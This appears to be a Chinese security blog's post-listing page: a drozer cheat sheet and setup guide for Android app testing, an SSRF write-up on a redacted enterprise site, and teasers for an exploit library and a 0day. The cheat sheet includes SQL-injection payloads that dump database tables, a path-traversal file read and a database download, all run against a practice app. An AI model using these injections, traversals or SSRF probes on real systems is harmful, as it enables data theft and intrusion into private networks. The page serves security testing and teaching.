首页
月影的wiki
搜索
1
2023HW漏洞POC、EXP补充
719 阅读
2
海康威视常见漏洞收集
568 阅读
3
Cobalt Strike 插件CSx3Ldr, 一键生成免杀木马
422 阅读
4
代码审计分析工具 Fortify-2023
295 阅读
5
windows域控常见打法
271 阅读
渗透测试
代码脚本
工具
备忘录
业余爱好
闲话
系统应急
梅花易数
小六壬
漏洞
登录
Search
月影
累计撰写
85
篇文章
累计收到
101
条评论
首页
栏目
渗透测试
代码脚本
工具
备忘录
业余爱好
闲话
系统应急
梅花易数
小六壬
漏洞
页面
月影的wiki
搜索到
30
篇与
的结果
2023-07-26
drozer常用命令
开始一个会话adb forward tcp:31415 tcp:31415 drozer console connect检索包信息run app.package.list -f <app name> run app.package.info -a <package name> run app.package.attacksurface Get attack surface of package run app.package.backup Lists packages that use the backup API (returns true on FLAG_ALLOW_BACKUP) run app.package.debuggable Find debuggable packages run app.package.info Get information about installed packages run app.package.launchintent Get launch intent of package run app.package.list List Packages run app.package.manifest Get AndroidManifest.xml of package run app.package.native Find Native libraries embedded in the application. run app.package.shareduid Look for packages with shared UIDs识别攻击面run app.package.attacksurface <package name>利用activityrun app.activity.info -a <package name> -u run app.activity.start --component <package name> <component name>利用内容提供商run app.provider.info -a <package name> run scanner.provider.finduris -a <package name> run app.provider.query <uri> run app.provider.update <uri> --selection <conditions> <selection arg> <column> <data> run scanner.provider.sqltables -a <package name> run scanner.provider.injection -a <package name> run scanner.provider.traversal -a <package name> run app.provider.finduri Find referenced content URIs in a package run app.provider.info Get information about exported content providers run app.provider.insert Insert into a Content Provider run app.provider.query Query a content provider run app.provider.read Read from a content provider that supports files run app.provider.update Update a record in a content provider利用广播接收器run app.broadcast.info -a <package name> run app.broadcast.send --component <package name> <component name> --extra <type> <key> <value> run app.broadcast.sniff --action <action>利用服务run app.service.info -a <package name> run app.service.start --action <action> --component <package name> <component name> run app.service.send <package name> <component name> --msg <what> <arg1> <arg2> --extra <type> <key> <value> --bundle-as-obj获取所有可访问的Uri命令 run scanner.provider.finduris -a <package name> 示例 run scanner.provider.finduris -a com.example.studayappp.sieveSQL注入命令 run app.provider.query <uri> [--projection] [--selection] 示例 run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/ 列出所有表 run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type=‘table‘;--" 获取单表(如Key)的数据 run app.provider.query content://com.example.studayappp.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"检测SQL注入命令 run scanner.provider.injection -a <package name> 示例 run scanner.provider.injection -a com.example.studayappp.sieve检测目录遍历命令 run scanner.provider.traversal -a <package name> 示例 run scanner.provider.traversal -a com.example.studayappp.sieve读取文件系统下的文件示例 run app.provider.read content://com.example.studayappp.sieve.FileBackupProvider/etc/hosts下载数据库文件到本地示例 run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db d:/database.db
2023年07月26日
15 阅读
0 评论
0 点赞
2023-07-26
app测试---drozer使用指南
1.drozer简介drozer是一款针对Android的安全测试框架,分为安装在PC端的控制台、安装在终端上的代理APP两部分。可以利用APP的IPC通信,动态的发现被测试APP的安全风险。drozer最主要的功能就是对安卓APP四大组件activity、 broadcast receivers、 content providers、 services进行安全测试。2.drozer安装环境配置Python2.7Protobuf 2.6+Pyopenssl 16.2+Twisted 10.2+Java Development Kit 1.7Android Debug Bridge安装方法电脑端https://github.com/WithSecureLabs/drozer下载对应系统的安装包手机端点击下载agentdrozer-agent-2.3.4.apk注意事项需要将python2设置优先使用测试机数据线连接电脑,打开开发者模式以及usb调试,打开agent并将下面的开关打开adb自己下载,并加到环境变量里,开启端口转发adb forward tcp:31415 tcp:31415drozer连接drozer.bat console connect //在PC端drozer目录下运行此命令如果显示以下内容,表示连接成功,如果遇到报错,翻到最下面解决方案篇查看一下当前运行的程序列表run app.package.listactivity组件的测试查看导出的activity组件run app.activity.info -a <package name> 启动某个Activity组件,判断是否有越权访问的漏洞run app.activity.start --component <包名> <组件名> 这里我们根据名称判断content provider组件的测试查看导出的content provider组件run app.provider.info -a <package name>获取所有可以访问的URIrun scanner.provider.finduris -a <package name>获取各个Uri的数据run app.provider.query <uri>解决方案问题一drozer console connect 报错Could not find java. Please ensure that it is installed and on your PATH. If this error persists, specify the path in the ~/.drozer_config file: [executables] java = C:\path\to\java There was a problem connecting to the drozer Server. Things to check: - is the drozer Server running? - have you set up appropriate adb port forwards? - have you specified the correct hostname and port with --server? - is the server protected with SSL (add an --ssl switch)? - is the agent protected with a password (add a --password switch)? Debug Information: [Errno 10061]解决方案:1、创建如下文件并命名为:drozer_config.txt (如果为winXP,则可以直接命名为.drozer_config)2、写入内容如下几行内容:此处为java.exe文件的安装位置,具体情况具体处理。[executables] java =C:\...(jdk的路径)\bin\java.exe javac =C:\...(jdk的路径)\bin\javac.exe drozer =...\drozer.bat3、把此文件放入个人目录下文件夹:英文:C:\Users\<youruser name>\中文:C:\用户\<你的用户名名称>\4、通过cmd命令重命名此文件为:.drozer_configrename drozer_config.txt .drozer_config问题二修复问题一后,重新连接报错There was a problem connecting to the drozer Server. Things to check: - is the drozer Server running? - have you set up appropriate adb port forwards? - have you specified the correct hostname and port with --server? - is the server protected with SSL (add an --ssl switch)? - is the agent protected with a password (add a --password switch)? Debug Information: [Errno 10061]解决方案:运行命令(我的问题就是我忘记做端口转发)adb forward tcp:31415 tcp:31415问题三与手机端连接失败:[Errno 10054]解决方案:1、确保手机端打开2、确保端口转发正确问题4:dz> run app.package.listunknown module: 'app.package.list' 解决:出现unknownmodule,这个时候在dz>中输入list,返回结果也是空白。解决方法是在cmd中将当前目录切换到drozer的安装路径下,如d:\drozer,然后再输入"drozerconsole connect"启动drozer。 问题5:运行 run scanner.provider.injection命令,或者运行 runapp.provider.finduri命令时,提示C:\Program Files\Java\jdk1.8.0_71\bin\javac.exe-cp D:\drozer\lib\drozer\lib\android.jar ZipUtil.java。。。。。之类的信息。。。这个真的没有什么好办法,试了很久,最后的解决方法是:不用drozer官网提供的windowsinstaller安装包,而是用drozer(Python .egg)安装包,用python的easy_install.exe安装egg文件。安装过程中会提示缺少twisted还有其他安装包,按安装提示做就可以了。问题6:还是运行 run scanner.provider.injection命令,或者运行 runapp.provider.finduri命令时,提示cannot resolve com.mwr.jdiesel.util.Strings这个貌似是手机上安装的agent.apk出问题了,我的是红米2a。解决:不要安装2.3.4版本的agent,用2.3.3就没有问题。给个2.3.3的链接 http://pan.baidu.com/s/1dDKkNtB更多报错跳转:https://www.codenong.com/cs109129915/
2023年07月26日
44 阅读
0 评论
0 点赞
2023-07-24
记一次某央企站点ssrf漏洞
漏洞描述SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造,由服务端发起请求的一个网络攻击,一般用来在外网探测或攻击内网服务,其影响效果根据服务器用的函数不同,从而造成不同的影响。SSRF 形成的原因大都是由于服务端提供了从其他服务器获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。2.ssrf利用1.内外网的端口和服务扫描2.主机本地敏感数据的读取3.内外网主机应用程序漏洞的利用4.内外网Web站点漏洞的利用影响参数复现步骤1、打开url:https://xx.xxx.com/#/并抓包将路由改成dnslog并发起请求可见服务器会向dnslog发起请求漏洞利用:内网服务探测:请求http://127.0.0.1:443 会提示302跳转并暴露内网网段可见安全网关网段,对c段进行遍历可以看见有302、301、403、和503的服务,根据跳转提示尝试访问10.75.74.41内网服务成功访问攻击者可以利用此漏洞访问内网服务,并进一步利用攻击修复方案1、限制用户输入的url并校验,防止ssrf攻击
2023年07月24日
6 阅读
0 评论
0 点赞
2023-07-17
漏洞库
三万多poc、exp漏洞库漏洞库.xlsx
2023年07月17日
13 阅读
0 评论
0 点赞
2023-07-13
0day(山洪灾害监测预警系统2.0服务模块任意文件上传漏洞)CVE-2023-3804
加密文章,请前往内页查看详情
2023年07月13日
6 阅读
0 评论
0 点赞
1
2
3
4
...
6